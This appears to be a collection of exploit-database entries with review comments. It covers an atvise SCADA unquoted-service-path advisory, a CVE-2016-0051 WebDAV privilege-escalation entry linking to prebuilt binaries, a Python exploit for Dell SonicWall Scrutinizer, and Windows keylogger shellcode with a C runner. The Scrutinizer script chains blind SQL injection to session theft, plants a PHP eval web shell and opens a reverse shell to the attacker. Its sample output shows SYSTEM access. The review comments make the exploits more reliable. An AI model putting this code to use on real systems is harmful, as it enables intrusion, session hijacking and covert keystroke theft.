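Review bot: The two `AND EAX` instructions in `eax_zeroed` are dead code: the next pair `push esp` / `pop eax` replaces EAX with ESP before anything reads it, so the zeroing contributes nothing but 10 bytes. They cannot simply be deleted, though, because removing them moves the shellcode relative to the stack address captured by `push esp`; as written the four `SUB EAX` immediates total 0xFFFFF2FB, i.e. EAX ends up at ESP + 0xD05, and that delta presumably has to land on the first byte of the alpha_upper decoder for `BufferRegister=EAX` to work, so any trim must be matched by re-tuning the immediates. A comment stating that target (`# EAX = ESP + 0xD05 -> start of decoder`) and explaining that `\x71\x04` in the nSEH slot is `jno +4` (presumably used because `\xeb` is in the bad-character list) would make the stub maintainable. The handler address `0x10012a78` is given without the module it lives in; name it so the exploit can be re-based when that DLL changes.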


@ -0,0 +1,57 @@

Certec EDV atvise SCADA server 2.5.9 Privilege Escalation Vulnerability
Vendor: Certec EDV GmbH
Product web page: http://www.atvise.com
Affected version: 2.5.9
Summary: atvise scada is based on newest technologies
and standards: The visualization in pure web technology
as well as a consistent vertical object orientation based
on OPC UA changes the world of process management systems.
Desc: The application suffers from an unquoted search path
issue impacting the service 'atserver' for Windows deployed
as part of atvise SCADA. This could potentially allow an
authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or
other security applications where it could potentially be
executed during application startup or reboot. If successful,
the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64-bit
Microsoft Windows 7 Ultimate SP1 (EN) 64-bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5321
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5321.php
Vendor: http://www.atvise.com/en/news-events/news/465-atvise-3-0-0-released
17.03.2016
---
C:\Users\user>sc qc atserver
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: atserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\atvise\atserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : atvise server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
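Review bot: The advisory says the attacker must "insert their code in the system root path" without spelling out what the unquoted `C:\Program Files\atvise\atserver.exe` actually demands: the path has a single space, so the service manager's first candidate is `C:\Program.exe`, and planting it needs write access to the root of `C:`, which default Windows 7 ACLs do not grant to standard users. Exploitability is therefore conditional on a loosened root-directory ACL; add an `icacls C:\` check to the PoC so readers verify that precondition rather than assume it. The fix is one line and worth stating: `sc config atserver binPath= "\"C:\Program Files\atvise\atserver.exe\""` (or quoting the ImagePath in the installer). `SERVICE_START_NAME : LocalSystem` together with `AUTO_START` is what turns a successful plant into SYSTEM at next boot.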


@ -0,0 +1,25 @@
# Exploit Title: WebDAV Elevation of Privilege Vulnerability (MS16)-2
# Date: 8/5/2016
# Exploit Author: hex0r
# Version:WebDAV on Windows 7 84x
# CVE : CVE-2016-0051
Intro:
Credits go to koczkatama for coding a PoC, however if you run this exploit
from shell connection, not a remote desktop, the result will be getting the
privileged shell in new GUI windows.
Again Thanks to
https://github.com/koczkatamas/CVE-2016-0051
https://www.exploit-db.com/exploits/39432/
PoC:
Download the source code (C#) also there will be compiled version as well,
copy the dll file and the executable to the target machine, run it to get
SYSTEM,
Proof of Concept:
https://github.com/hexx0r/CVE-2016-0051
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip
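Review bot: The entry gives no affected patch level — only `WebDAV on Windows 7 84x` (presumably x64; confirm) — so an operator cannot tell whether a host that already carries the fix for CVE-2016-0051 is still exposed; complete the truncated `(MS16)` bulletin reference in the title and state the vulnerable and fixed builds. The PoC is distributed as a prebuilt executable plus DLL inside the zip; publish the SHA-256 of both and direct readers to build from the linked source, since running unverified binaries during a privilege-escalation test is itself a supply-chain risk. The stated difference from the koczkatamas PoC (a SYSTEM shell in the caller's console instead of a new GUI window) is a usability change, not a new vulnerability, and the write-up should say so.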

280
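--- /dev/null
+++ b/platforms/windows/remote/39783.py
@@ -0,0 +1,280 @@
+#!/usr/local/bin/python
+"""
+Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQL Injection Remote Code Execution
+sonic.py by mr_me@offensive-security.com
+greets to @brandonprry ;->
+Summary:
+========
+This exploits an pre-auth SQL Injection in the login.php script within an update statement to steal session data. You could also steal login creds
+which require absolutely no hash cracking since the target uses symmetric encryption. It then exploits a second post-auth SQL Injection vulnerability
+that writes a shell to the target using a relative path and gets SYSTEM.
+Vulnerability:
+==============
+In html/d4d/login.php on lines 27-34:
+}else if ($_REQUEST['setSkin']){
+echo setUserSkin(
+array(
+'db' => $db,
+'user_id' => $_REQUEST['user_id'],
+'skin' => $_REQUEST['setSkin']
+)
+);
+Then, on lines 46-62:
+function setUserSkin($args){
+$db = $args['db'];
+$result = $db->query("
+UPDATE plixer.userpreferences
+SET setting = '$args[skin]'
+WHERE prefCode = 'skin'
+AND users_id = $args[user_id]");
+if ($args['user_id'] == 1){
+$result2 = $db->query("
+UPDATE plixer.serverprefs
+SET currentVal = '$args[skin]'
+WHERE langKey = 'skin'");
+}
+}
+For the post-auth bug, see https://gist.github.com/brandonprry/76741d9a0d4f518fe297
+Example:
+========
+saturn:module-03 mr_me$ ./sonic.py
+Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
+mr_me@offensive-security.com
+(!) usage: ./poc.py <target> <connectback:port>
+saturn:module-03 mr_me$ ./poc.py 172.16.175.147 172.16.175.1:1111
+Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
+mr_me@offensive-security.com
+(+) target is vuln, proceeding
+(+) waiting for session data... starting at: 2016-05-06 16:31:37.022818
+(+) awesome, appears like someone has logged in...
+(+) it took 0:00:05.020670 to detect valid session data
+(+) extracting session data... 1:NfS5yetP49TXCqP5
+(+) backdooring target...
+(+) starting handler on port 1111
+(+) connection from 172.16.175.147
+(+) pop thy shell!
+whoami
+nt authority\system
+ipconfig
+Windows IP Configuration
+Ethernet adapter Local Area Connection:
+Connection-specific DNS Suffix . : localdomain
+IP Address. . . . . . . . . . . . : 172.16.175.147
+Subnet Mask . . . . . . . . . . . : 255.255.255.0
+Default Gateway . . . . . . . . . : 172.16.175.2
+*** Connection closed by remote host ***
+"""
+import re
+import sys
+import requests
+import datetime
+import socket
+import telnetlib
+import email.utils as eut
+from threading import Thread
+from base64 import b64encode as b64e
+lower_value = 0
+upper_value = 126
+def banner():
+return """\n\tDell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t\n\tmr_me@offensive-security.com\n"""
+def ct():
+return datetime.datetime.now()
+def parsedate(text):
+return datetime.datetime(*eut.parsedate(text)[:6])
+def check_args():
+global target, lserver, lport
+if len(sys.argv) < 3:
+return False
+cb = sys.argv[2]
+target = "http://%s" % sys.argv[1]
+if not ":" in cb:
+return False
+if not cb.split(":")[1].isdigit():
+return False
+lserver = cb.split(":")[0]
+lport = int(cb.split(":")[1])
+return True
+def validate():
+r = requests.get("%s/index.html" % target)
+if re.search('Scrutinizer 11.0.1', r.text):
+return True
+return False
+def have_sessions(time):
+"""
+check if we have sessions
+"""
+sqli = "if(ascii(substring((select count(session_id) from sessions),1,1))!=48,sleep(%s),null)" % (time)
+url = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+st = ct()
+r = requests.get("%s/%s" % (target, url))
+delta = ct()-st
+if int(delta.seconds) < time:
+return False
+return True
+def do_time_based_blind(sql, time):
+lower = lower_value
+upper = upper_value
+while lower < upper:
+try:
+mid = (lower + upper) / 2
+url = "%s/%s" % (target, ("%s>%s,sleep(%s),null)" % (sql, str(mid), time)))
+st = ct()
+r = requests.get(url)
+delta = ct()-st
+if int(delta.seconds) >= time:
+lower = mid + 1
+else:
+upper = mid
+except (KeyboardInterrupt, SystemExit):
+raise
+except:
+pass
+if lower > lower_value and lower < upper_value:
+value = lower
+else:
+url = "%s/%s" % (target, ("%s=%s,sleep(%s),null)" % (sql, str(lower), time)))
+st = ct()
+r = requests.get(url)
+delta = ct()-st
+if int(delta.seconds) >= time:
+value = lower
+return value
+def steal_session_length():
+xlen = ""
+sqli = "if(ascii(substring((select length(length(concat(user_id,0x3a,session_id))) from sessions limit 0,1),1,1))"
+qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+zlen = int(chr(do_time_based_blind(qry_str, 5)))
+for i in range(0, zlen):
+sqli = "if(ascii(substring((select length(concat(user_id,0x3a,session_id)) from sessions limit 0,1),%d,1))" % (i+1)
+qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+xlen += chr(do_time_based_blind(qry_str, 5))
+return int(xlen)
+def steal_session(length, time):
+session = ""
+for i in range(0, length):
+sqli = "if(ascii(substring((select concat(user_id,0x3a,session_id) from sessions limit 0,1),%d,1))" % (i+1)
+qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
+char = chr(do_time_based_blind(qry_str, 5))
+session += char
+sys.stdout.write(char)
+sys.stdout.flush()
+return session
+# build the reverse php shell
+def build_php_code():
+phpkode = ("""
+@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
+phpkode += ("""$dis=@ini_get('disable_functions');""")
+phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
+phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
+phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
+phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
+phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
+phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
+phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
+phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
+phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
+phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
+phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
+phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
+phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
+phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
+phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
+phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
+phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
+phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
+phpkode += ("""$nofuncs='no exec functions'; """)
+phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
+phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (lserver, lport))
+phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
+phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
+phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
+phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
+phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (lserver, lport))
+phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
+phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
+phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
+phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
+phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
+phpkode += ("""}@socket_close($s);} """)
+return phpkode
+def kill_shot(stolen_data):
+user_id = stolen_data.split(":")[0]
+sessionid = stolen_data.split(":")[1]
+url = "d4d/dashboards.php?deleteTab=1 union select '<?php eval(base64_decode($_COOKIE[\\'awae\\'])); ?>' into outfile '../../html/d4d/offsec.php'"
+requests.get("%s/%s" % (target, url), cookies={"userid": user_id, "sessionid": sessionid})
+def exec_code():
+phpkodez = b64e(build_php_code())
+handlerthr = Thread(target=handler, args=(lport,))
+handlerthr.start()
+requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
+def handler(lport):
+print "(+) starting handler on port %d" % lport
+t = telnetlib.Telnet()
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.bind(("0.0.0.0", lport))
+s.listen(1)
+conn, addr = s.accept()
+print "(+) connection from %s" % addr[0]
+t.sock = conn
+print "(+) pop thy shell!"
+t.interact()
+def main():
+if check_args():
+if validate():
+print "(+) target is vuln, proceeding"
+st = ct()
+print "(+) waiting for session data... starting at: %s" % ct()
+# we dont use recursion since we could get stack exhaustion.
+while not have_sessions(5):
+pass
+print "(+) awesome, appears like someone has logged in... "
+print "(+) it took %s to detect valid session data" % (ct()-st)
+sys.stdout.flush()
+sys.stdout.write("(+) extracting session data... ")
+dataz = steal_session(steal_session_length(), 5)
+print "\n(+) backdooring target..."
+kill_shot(dataz)
+exec_code()
+else:
+print "(!) usage: %s <target> <connectback:port>" % sys.argv[0]
+if __name__ == "__main__":
+print banner()
+main()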
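Review bot: `do_time_based_blind` can return an unassigned `value`: when the search ends at `lower == lower_value` or `lower == upper_value` the else branch sends a confirmation query and assigns `value` only if the sleep was observed, so one timing miss raises `UnboundLocalError` from `return value` instead of a meaningful error. Initialise `value = None` before the loop and finish the else branch with `else: raise RuntimeError("could not recover a byte for %s" % sql)`, so a bad inference aborts rather than silently corrupting the session string passed to `kill_shot`. The bare `except: pass` in the loop is worse than it looks: a transport error leaves `lower`/`upper` untouched, so the loop re-issues the same `mid` forever if the target stops answering — catch `requests.RequestException`, count retries and give up. `handler` binds `0.0.0.0` and hands the shell to the first peer that connects; bind to `lserver` and at least compare `addr[0]` with the target host so a third party on the same network cannot pick up the SYSTEM session. The `have_sessions`/`steal_*` query strings carry `setSkin=1&user_id=setSkin=1&user_id=%s`, where the first `user_id` is overridden by the second; it works with last-wins parameter parsing but reads as a paste artifact and should be reduced to a single `user_id`.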


@ -0,0 +1,245 @@
/*
; Exploit Title: All windows null free shellcode - primitave keylogger to file - 431 (0x01AF) bytes
; Date: Sat Apr 23 18:34:25 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable.
; it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format:
; "Virtual-Key Codes", from msdn.microsoft.com website
section .bss
section .data
section .text
global _start
_start:
cld ; 00000000 FC
xor edx,edx ; 00000001 31D2
mov dl,0x30 ; 00000003 B230
push dword [fs:edx] ; 00000005 64FF32
pop edx ; 00000008 5A
mov edx,[edx+0xc] ; 00000009 8B520C
mov edx,[edx+0x14] ; 0000000C 8B5214
loc_fh:
mov esi,[edx+0x28] ; 0000000F 8B7228
xor eax,eax ; 00000012 31C0
mov ecx,eax ; 00000014 89C1
mov cl,0x3 ; 00000016 B103
loc_18h:
lodsb ; 00000018 AC
rol eax,byte 0x8 ; 00000019 C1C008
lodsb ; 0000001C AC
loop loc_18h ; 0000001D E2F9
lodsb ; 0000001F AC
cmp eax,0x4b45524e ; 00000020 3D4E52454B
jz loc_2ch ; 00000025 7405
cmp eax,0x6b65726e ; 00000027 3D6E72656B
loc_2ch:
mov ebx,[edx+0x10] ; 0000002C 8B5A10
mov edx,[edx] ; 0000002F 8B12
jnz loc_fh ; 00000031 75DC
mov edx,[ebx+0x3c] ; 00000033 8B533C
add edx,ebx ; 00000036 01DA
push dword [edx+0x34] ; 00000038 FF7234
mov edx,[edx+0x78] ; 0000003B 8B5278
add edx,ebx ; 0000003E 01DA
mov esi,[edx+0x20] ; 00000040 8B7220
add esi,ebx ; 00000043 01DE
;GetProcAddress
xor ecx,ecx ; 00000045 31C9
loc_47h:
inc ecx ; 00000047 41
lodsd ; 00000048 AD
add eax,ebx ; 00000049 01D8
cmp dword [eax],0x50746547 ; 0000004B 813847657450
jnz loc_47h ; 00000051 75F4
cmp dword [eax+0x4],0x41636f72 ; 00000053 817804726F6341
jnz loc_47h ; 0000005A 75EB
cmp dword [eax+0x8],0x65726464 ; 0000005C 81780864647265
jnz loc_47h ; 00000063 75E2
dec ecx ; 00000065 49
mov esi,[edx+0x24] ; 00000066 8B7224
add esi,ebx ; 00000069 01DE
mov cx,[esi+ecx*2] ; 0000006B 668B0C4E
mov esi,[edx+0x1c] ; 0000006F 8B721C
add esi,ebx ; 00000072 01DE
mov edx,[esi+ecx*4] ; 00000074 8B148E
add edx,ebx ; 00000077 01DA
mov edi,edx ; 00000079 89D7
push edx ; 0000007B 52
;GetModuleHandleA
xor eax,eax ; 0000007C 31C0
push eax ; 0000007E 50
push dword 0x41656c64 ; 0000007F 68646C6541
push dword 0x6e614865 ; 00000084 686548616E
push dword 0x6c75646f ; 00000089 686F64756C
push dword 0x4d746547 ; 0000008E 684765744D
push esp ; 00000093 54
push ebx ; 00000094 53
call edi ; 00000095 FFD7
lea esp,[esp+0x14] ; 00000097 8D642414
push eax ; 0000009B 50
;GetModuleHandleA("USER32.DLL")
push dword 0x88014c4c ; 0000009C 684C4C0188
dec byte [esp+0x2] ; 000000A1 FE4C2402
push dword 0x442e3233 ; 000000A5 6833322E44
push dword 0x52455355 ; 000000AA 6855534552
push esp ; 000000AF 54
call eax ; 000000B0 FFD0
xor edx,edx ; 000000B2 31D2
cmp eax,edx ; 000000B4 39D0
jnz loc_f0h ; 000000B6 7538
lea esp,[esp+0xc] ; 000000B8 8D64240C
;LoadLibraryA
push edx ; 000000BC 52
push dword 0x41797261 ; 000000BD 6861727941
push dword 0x7262694c ; 000000C2 684C696272
push dword 0x64616f4c ; 000000C7 684C6F6164
push esp ; 000000CC 54
push ebx ; 000000CD 53
call edi ; 000000CE FFD7
lea esp,[esp+0x10] ; 000000D0 8D642410
push eax ; 000000D4 50
;LoadLibraryA("USER32.DLL")
push dword 0x77014c4c ; 000000D5 684C4C0177
dec byte [esp+0x2] ; 000000DA FE4C2402
push dword 0x442e3233 ; 000000DE 6833322E44
push dword 0x52455355 ; 000000E3 6855534552
push esp ; 000000E8 54
call eax ; 000000E9 FFD0
lea esp,[esp+0xc] ; 000000EB 8D64240C
push eax ; 000000EF 50
;GetKeyState
loc_f0h:
mov edx,eax ; 000000F0 89C2
push dword 0x1657461 ; 000000F2 6861746501
dec byte [esp+0x3] ; 000000F7 FE4C2403
push dword 0x74537965 ; 000000FB 6865795374
push dword 0x4b746547 ; 00000100 684765744B
push esp ; 00000105 54
push edx ; 00000106 52
call edi ; 00000107 FFD7
lea esp,[esp+0xc] ; 00000109 8D64240C
push eax ; 0000010D 50
;WriteFile
push dword 0x55010165 ; 0000010E 6865010155
dec byte [esp+0x1] ; 00000113 FE4C2401
push dword 0x6c694665 ; 00000117 686546696C
push dword 0x74697257 ; 0000011C 6857726974
push esp ; 00000121 54
push ebx ; 00000122 53
call edi ; 00000123 FFD7
lea esp,[esp+0xc] ; 00000125 8D64240C
push eax ; 00000129 50
;CreateFileA
push dword 0x141656c ; 0000012A 686C654101
dec byte [esp+0x3] ; 0000012F FE4C2403
push dword 0x69466574 ; 00000133 6874654669
push dword 0x61657243 ; 00000138 6843726561
push esp ; 0000013D 54
push ebx ; 0000013E 53
call edi ; 0000013F FFD7
lea esp,[esp+0xc] ; 00000141 8D64240C
push eax ; 00000145 50
push dword 0x16e6962 ; 00000146 6862696E01
dec byte [esp+0x3] ; 0000014B FE4C2403
push dword 0x2e676f6c ; 0000014F 686C6F672E
xor ecx,ecx ; 00000154 31C9
push ecx ; 00000156 51
push ecx ; 00000157 51
add byte [esp],0x80 ; 00000158 80042480
push byte +0x4 ; 0000015C 6A04
push ecx ; 0000015E 51
push byte +0x2 ; 0000015F 6A02
push ecx ; 00000161 51
add byte [esp],0x4 ; 00000162 80042404
lea ecx,[esp+0x18] ; 00000166 8D4C2418
push ecx ; 0000016A 51
call eax ; 0000016B FFD0
lea esp,[esp+0x8] ; 0000016D 8D642408
push eax ; 00000171 50
;main loop
loc_172h:
xor ecx,ecx ; 00000172 31C9
xor esi,esi ; 00000174 31F6
loc_176h:
mov cl,0xff ; 00000176 B1FF
mov eax,esi ; 00000178 89F0
cmp al,cl ; 0000017A 38C8
jc loc_180h ; 0000017C 7202
xor esi,esi ; 0000017E 31F6
loc_180h:
inc esi ; 00000180 46
push esi ; 00000181 56
call dword [esp+0x10] ; 00000182 FF542410
mov edx,esi ; 00000186 89F2
xor ecx,ecx ; 00000188 31C9
mov cl,0x80 ; 0000018A B180
and eax,ecx ; 0000018C 21C8
xor ecx,ecx ; 0000018E 31C9
cmp eax,ecx ; 00000190 39C8
jz loc_176h ; 00000192 74E2
push edx ; 00000194 52
push ecx ; 00000195 51
lea ecx,[esp] ; 00000196 8D0C24
push ecx ; 00000199 51
push byte +0x1 ; 0000019A 6A01
lea ecx,[esp+0xc] ; 0000019C 8D4C240C
push ecx ; 000001A0 51
push dword [esp+0x14] ; 000001A1 FF742414
call dword [esp+0x20] ; 000001A5 FF542420
lea esp,[esp+0x4] ; 000001A9 8D642404
jmp short loc_172h ; 000001AD EBC3
*/
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
"\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
"\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
"\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
"\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
"\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
"\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
"\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
"\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
"\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
"\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
"\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
"\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
"\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
"\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
"\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
"\xd7\x8d\x64\x24\x0c\x50\x68\x62\x69\x6e\x01\xfe\x4c\x24\x03\x68"
"\x6c\x6f\x67\x2e\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51\x6a"
"\x02\x51\x80\x04\x24\x04\x8d\x4c\x24\x18\x51\xff\xd0\x8d\x64\x24"
"\x08\x50\x31\xc9\x31\xf6\xb1\xff\x89\xf0\x38\xc8\x72\x02\x31\xf6"
"\x46\x56\xff\x54\x24\x10\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9"
"\x39\xc8\x74\xe2\x52\x51\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c"
"\x51\xff\x74\x24\x14\xff\x54\x24\x20\x8d\x64\x24\x04\xeb\xc3";
int main(int argc, char *argv[]){
printf("Shellcode length: %d\n", (int)strlen(sc));
(*(void(*)(void))&sc)();
return 0;
}
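Review bot: The call `(*(void(*)(void))&sc)();` in `main` treats the address of a writable global array as code; whether the data segment holding `sc` is executable is a property of the build and loader, not of this source, so on a DEP/NX-enforcing system the harness prints the length and then faults at that line — the `section .text` directive in the comment block describes the assembler's layout, not the C build. That assumption deserves a comment above `main`, e.g. `/* sc is a writable global; this call only runs where the data segment is executable */`. As a point of style, `&sc` has type `unsigned char (*)[432]` rather than `unsigned char *`, so the conventional cast is `(void (*)(void))sc`, and with `argc`/`argv` unused the signature can be `int main(void)` with `printf("Shellcode length: %zu\n", strlen(sc));` to drop the `(int)` cast. The 431 (0x01AF) byte count in the header matches the 431 escape bytes in the `sc` initializer (26 string lines of 16 bytes plus a final line of 15), which is what makes the `strlen` print meaningful for a null-free blob.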